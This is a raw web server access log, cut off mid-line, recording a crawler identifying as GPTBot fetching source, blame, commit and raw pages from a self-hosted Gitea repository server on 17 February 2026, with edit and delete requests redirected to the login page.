[Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13052] [Gzip 6.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 26204] [Gzip 10.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:36:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:16:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 8207] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 10261] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 1937] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 14301] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 10058] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11931] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:36:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:36:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:36:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44560] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31306] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11413] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23736] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 11126] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11790] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" -[17/Feb/2026:16:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8487] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:16:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7804] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" -[17/Feb/2026:16:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?state=closed" [Client 74.7.227.38] [Length 8481] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:16:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:16:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?files=C%2b%2bProject" [Client 74.7.227.38] [Length 15219] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:16:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11895] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:36:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:36:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:16:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 